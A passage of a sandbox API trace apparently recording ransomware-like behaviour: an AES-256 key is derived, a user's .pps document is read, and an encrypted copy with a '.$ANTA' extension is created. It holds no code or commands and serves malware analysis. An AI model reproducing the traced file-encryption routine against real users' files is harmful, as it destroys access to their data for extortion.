lpUsedDefaultChar=0x0) returned 35 [0080.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x43c3770, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0080.381] CryptHashData (hHash=0x41ac740, pbData=0x17e2ae8, dwDataLen=0x22, dwFlags=0x1) returned 1 [0080.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.381] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0080.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0080.381] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43c3608, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0080.382] CryptDeriveKey (in: hProv=0x41a4d00, Algid=0x6610, hBaseData=0x41ac740, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac040) returned 1 [0080.382] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0080.382] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0080.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0080.382] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1797088, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0080.382] CryptDestroyHash (hHash=0x41ac740) returned 1 [0080.382] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\244ql-yoiaa.pps"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0080.382] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.382] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7a8 | out: lpNewFilePointer=0x0) returned 1 [0080.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0080.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1b0 [0080.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0080.382] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b10 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2940 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0080.383] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1e0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391a80 [0080.383] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4051040 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43595f0 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x70) returned 0x431e298 [0080.384] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w")) returned 0x10 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43fb3b0 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2d0 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0080.384] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\244Ql-yOIaa.pps.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\244ql-yoiaa.pps.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb270 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0080.384] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0080.385] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac600 [0080.385] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29c0 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ec8 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.385] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0a020 [0080.388] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e7f8 | out: lpNewFilePointer=0x0) returned 1 [0080.388] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x6707, lpOverlapped=0x0) returned 1 [0080.389] ReadFile (in: hFile=0x258, lpBuffer=0x43eb3a8, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e820, lpOverlapped=0x0 | out: lpBuffer=0x43eb3a8*, lpNumberOfBytesRead=0x144e820*=0x0, lpOverlapped=0x0) returned 1 [0080.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0d8 | out: hHeap=0x1780000) returned 1 [0080.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ae0 | out: hHeap=0x1780000) returned 1 [0080.389] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb348 | out: hHeap=0x1780000) returned 1 [0080.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.389] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6707) returned 0x499a008 [0080.391] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0a020 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2aa0 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6707) returned 0x49a0718 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.394] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.394] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6707) returned 0x499a008 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x499a008 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0080.394] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb2a0 | out: hHeap=0x1780000) returned 1 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d01c0 | out: hHeap=0x1780000) returned 1 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.395] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0080.395] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29a0 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b60 [0080.395] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b60 | out: hHeap=0x1780000) returned 1 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd88 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2a70 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6707) returned 0x499a008 [0080.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2940 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0080.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0080.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e29c0 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb258 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ab0 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb120 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0080.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb1e0 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1f8 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x6707) returned 0x49a6e28 [0080.396] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0080.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2a0 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0d8 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb210 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb348 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2af0 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb300 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0080.397] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0080.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0080.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac740 [0080.397] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0080.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb228 | out: hHeap=0x1780000) returned 1 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb228 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0080.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb108 | out: hHeap=0x1780000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8cc0 [0080.398] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0080.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0080.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2960 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb090 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0080.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb318 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb0f0 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0080.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb0f0 | out: hHeap=0x1780000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe50 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2b8 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9260 [0080.398] PeekMessageW (in: lpMsg=0x144e18c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e18c) returned 0 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb108 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb240 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0080.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb168 | out: hHeap=0x1780000) returned 1 [0080.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb2e8 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb360 [0080.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796f28 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb378 [0080.399] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb168 [0080.399] RtlAllocateHeap (HeapHandle=0x1780000, 